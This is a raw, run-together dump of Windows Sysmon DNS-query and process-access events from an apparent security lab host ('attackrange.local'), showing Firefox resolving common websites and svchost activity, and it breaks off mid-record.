Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd7ca7|C:\Program Files\Mozilla Firefox\xul.dll+a853c6|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.272{59A5CD1D-945A-6005-3305-00000000A301}7052joinhoney.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.257{59A5CD1D-945A-6005-3305-00000000A301}7052joinhoney.com0107.178.251.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.256{59A5CD1D-945A-6005-3305-00000000A301}7052www.joinhoney.com0type: 5 joinhoney.com;::ffff:107.178.251.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.185{59A5CD1D-945A-6005-3305-00000000A301}7052monday.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.175{59A5CD1D-945A-6005-3305-00000000A301}7052monday.com013.227.219.19;13.227.219.71;13.227.219.90;13.227.219.104;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.175{59A5CD1D-945A-6005-3305-00000000A301}7052www.nzz.ch9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.175{59A5CD1D-945A-6005-3305-00000000A301}7052monday.com0::ffff:13.227.219.104;::ffff:13.227.219.19;::ffff:13.227.219.71;::ffff:13.227.219.90;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.174{59A5CD1D-945A-6005-3305-00000000A301}7052d1860nkzpr7ksr.cloudfront.net02600:9000:21a1:bc00:10:e1a5:2c0:93a1;2600:9000:21a1:c200:10:e1a5:2c0:93a1;2600:9000:21a1:f000:10:e1a5:2c0:93a1;2600:9000:21a1:f800:10:e1a5:2c0:93a1;2600:9000:21a1:2e00:10:e1a5:2c0:93a1;2600:9000:21a1:4e00:10:e1a5:2c0:93a1;2600:9000:21a1:7400:10:e1a5:2c0:93a1;2600:9000:21a1:a600:10:e1a5:2c0:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.173{59A5CD1D-945A-6005-3305-00000000A301}7052www.nzz.ch0194.40.217.50;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.173{59A5CD1D-945A-6005-3305-00000000A301}7052www.nzz.ch0::ffff:194.40.217.50;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.173{59A5CD1D-945A-6005-3305-00000000A301}7052e8178.e6.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.172{59A5CD1D-945A-6005-3305-00000000A301}7052d1860nkzpr7ksr.cloudfront.net099.84.144.38;99.84.144.40;99.84.144.66;99.84.144.70;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.171{59A5CD1D-945A-6005-3305-00000000A301}7052www.n-tv.de0type: 5 d1860nkzpr7ksr.cloudfront.net;::ffff:99.84.144.70;::ffff:99.84.144.38;::ffff:99.84.144.40;::ffff:99.84.144.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.171{59A5CD1D-945A-6005-3305-00000000A301}7052e11619.dsce6.akamaiedge.net02a02:26f0:3100:196::2d63;2a02:26f0:3100:1b7::2d63;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.171{59A5CD1D-945A-6005-3305-00000000A301}7052e8178.e6.akamaiedge.net023.205.247.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.170{59A5CD1D-945A-6005-3305-00000000A301}7052www.tagesschau.de0type: 5 san.tagesschau.de.edgekey.net;type: 5 e8178.e6.akamaiedge.net;::ffff:23.205.247.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.168{59A5CD1D-945A-6005-3305-00000000A301}7052e11619.dsce6.akamaiedge.net023.205.240.33;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.168{59A5CD1D-945A-6005-3305-00000000A301}7052www.dw.com0type: 5 www.dw.com.edgekey.net;type: 5 e11619.dsce6.akamaiedge.net;::ffff:23.205.240.33;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.167{59A5CD1D-945A-6005-3305-00000000A301}7052djvbdz1obemzo.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.166{59A5CD1D-945A-6005-3305-00000000A301}7052djvbdz1obemzo.cloudfront.net013.224.194.201;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.165{59A5CD1D-945A-6005-3305-00000000A301}7052www.amazon.de0type: 5 tp.abe2c2f23-frontier.amazon.de;type: 5 djvbdz1obemzo.cloudfront.net;::ffff:13.224.194.201;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.165{59A5CD1D-945A-6005-3305-00000000A301}7052getpocket.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.165{59A5CD1D-945A-6005-3305-00000000A301}7052reddit.map.fastly.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.163{59A5CD1D-945A-6005-3305-00000000A301}7052getpocket.com052.54.152.216;54.162.142.192;54.209.230.187;23.20.137.146;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.163{59A5CD1D-945A-6005-3305-00000000A301}7052reddit.map.fastly.net0151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.163{59A5CD1D-945A-6005-3305-00000000A301}7052getpocket.com0::ffff:23.20.137.146;::ffff:52.54.152.216;::ffff:54.162.142.192;::ffff:54.209.230.187;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.163{59A5CD1D-945A-6005-3305-00000000A301}7052www.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.161{59A5CD1D-945A-6005-3305-00000000A301}7052dyna.wikimedia.org02620:0:862:ed1a::1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.159{59A5CD1D-945A-6005-3305-00000000A301}7052star-mini.c10r.facebook.com02a03:2880:f11c:8183:face:b00c:0:25de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.159{59A5CD1D-945A-6005-3305-00000000A301}7052dyna.wikimedia.org091.198.174.192;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.159{59A5CD1D-945A-6005-3305-00000000A301}7052www.wikipedia.org0type: 5 dyna.wikimedia.org;::ffff:91.198.174.192;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.158{59A5CD1D-945A-6005-3305-00000000A301}7052star-mini.c10r.facebook.com0157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.157{59A5CD1D-945A-6005-3305-00000000A301}7052www.facebook.com0type: 5 star-mini.c10r.facebook.com;::ffff:157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.156{59A5CD1D-945A-6005-3305-00000000A301}7052e11847.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.154{59A5CD1D-945A-6005-3305-00000000A301}7052youtube-ui.l.google.com02a00:1450:4001:80b::200e;2a00:1450:4001:817::200e;2a00:1450:4001:820::200e;2a00:1450:4001:821::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.154{59A5CD1D-945A-6005-3305-00000000A301}7052e11847.g.akamaiedge.net0104.79.89.85;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.153{59A5CD1D-945A-6005-3305-00000000A301}7052www.ebay.de0type: 5 slot11847.ebay.com.edgekey.net;type: 5 e11847.g.akamaiedge.net;::ffff:104.79.89.85;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.152{59A5CD1D-945A-6005-3305-00000000A301}7052youtube-ui.l.google.com0172.217.18.110;172.217.21.238;172.217.22.78;172.217.22.110;172.217.23.110;172.217.23.174;216.58.205.238;216.58.207.46;216.58.207.78;216.58.208.46;216.58.210.14;216.58.212.142;216.58.212.174;142.250.74.206;172.217.16.142;172.217.16.174;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:02.152{59A5CD1D-945A-6005-3305-00000000A301}7052www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:172.217.16.174;::ffff:172.217.18.110;::ffff:172.217.21.238;::ffff:172.217.22.78;::ffff:172.217.22.110;::ffff:172.217.23.110;::ffff:172.217.23.174;::ffff:216.58.205.238;::ffff:216.58.207.46;::ffff:216.58.207.78;::ffff:216.58.208.46;::ffff:216.58.210.14;::ffff:216.58.212.142;::ffff:216.58.212.174;::ffff:142.250.74.206;::ffff:172.217.16.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:01.362{59A5CD1D-8E56-6005-2E00-00000000A301}246476.237.120.34.in-addr.arpa.0type: 12 76.237.120.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 10341000x800000000000000017228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:04.098{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:04.098{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:04.098{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:04.098{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:04.098{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.837{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.837{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.708{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.708{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla 